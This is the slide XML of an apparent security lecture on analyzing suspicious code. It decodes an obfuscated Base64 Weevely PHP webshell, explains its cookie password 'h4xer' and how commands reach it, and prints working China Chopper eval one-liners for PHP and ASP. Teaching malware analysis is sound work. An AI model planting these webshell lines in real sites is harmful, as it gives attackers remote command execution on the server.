    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386132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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdoNCcgJiYgJGMoJGEpPjMpeyRrPSd4ZXInO2VjaG8nPCcuJGsuJz4nO2V2YWwoYmFzZTY0X2RlY29kZShwcmVnX3JlcGxhY2UoYXJyYXkoJy9bXlx3PVxzXS8nLCcvXHMvJyksYXJyYXkoJycsJysnKSxqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9DQoNCg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31925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3EDF-9DB6-C346-AA44-917461C06A32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analyzing Suspicious Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88114573-BFEE-DC45-8C66-8954CB34E2F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Base64 encoding takes 3 bytes and represents them as four ASCII characters. = is used for padding the output when the input is not divisible by 3.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>(so if you see a block of text with 1-2 equal signs after it it may be a sign of Base64 encoding)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2367038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9354-8642-DA49-9850-A44394358D6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analyzing Suspicious Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E56F5A1E-7A4B-9548-AFF1-A59CF28A906C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdoNCcgJiYgJGMoJGEpPjMpeyRrPSd4ZXInO2VjaG8nPCcuJGsuJz4nO2V2YWwoYmFzZTY0X2RlY29kZShwcmVnX3JlcGxhY2UoYXJyYXkoJy9bXlx3PVxzXS8nLCcvXHMvJyksYXJyYXkoJycsJysnKSxqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9DQoNCg==</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.base64decode.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$c='count';$a=$_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>COOKIE;if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(reset($a)=='h4' &amp;&amp; $c($a)&gt;3){$k='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>';echo'&lt;'.$k.'&gt;';eval(base64_decode(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>preg_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(array('/[^\w=\s]/','/\s/'),array('','+'),join(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>array_slice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>a,$c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($a)-3)))));echo '&lt;/'.$k.'&gt;';}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9588F15-F8DF-814F-8ABF-F836C717BE1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4230624" y="3429000"/>
            <a:ext cx="0" cy="48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01FDD5-C89B-D04F-98BB-F8288A52B145}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4230624" y="4267200"/>
            <a:ext cx="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89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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$c='count';$a=$_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>COOKIE;if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(reset($a)=='h4' &amp;&amp; $c($a)&gt;3){$k='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>';echo'&lt;'.$k.'&gt;';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(base64_decode(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>preg_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(array('/[^\w=\s]/','/\s/'),array('','+'),join(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>array_slice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>a,$c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($a)-3)))));echo '&lt;/'.$k.'&gt;';}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4293426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Suspicious Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>$c='count';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>$a=$_COOKIE;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>if(reset($a)=='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>' &amp;&amp; $c($a)&gt;3){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>$k='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>echo '&lt;'.$k.'&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>(base64_decode(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>preg_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>(array('/[^\w=\s]/','/\s/'), array('','+'), join(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>array_slice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>a,$c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>($a)-3)))));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>echo '&lt;/'.$k.'&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3861849" y="5543032"/>
            <a:ext cx="4445417" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password = h4xer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77159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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Commands passed as a cookie to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, the password is the cookie name, and the cookie value is the command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="weevely.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-5028" r="-5028"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="213515" y="2439885"/>
            <a:ext cx="7489661" cy="4119025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231551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B0E9-9556-7649-A6DF-757F0FFD39E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Webshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A978DF3-36C1-A640-8DB7-9A4678C85C67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Want to try reversing this yourself?  Take the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>Weevely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> shell you generated in week 5 and turn it back into the original PHP code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4011300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 Chopper</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>China Chopper – super tiny </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, heavy lifting done on the client/attacker side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>php</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eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($_POST['password']);?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;%@ Page Language="Jscript"%&gt;&lt;%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eval</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Request.Item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>["password"],"unsafe");%&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="439456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malicious code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This also extends to HTML and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iframes</a:t>
            </a:r>
            <a:r>
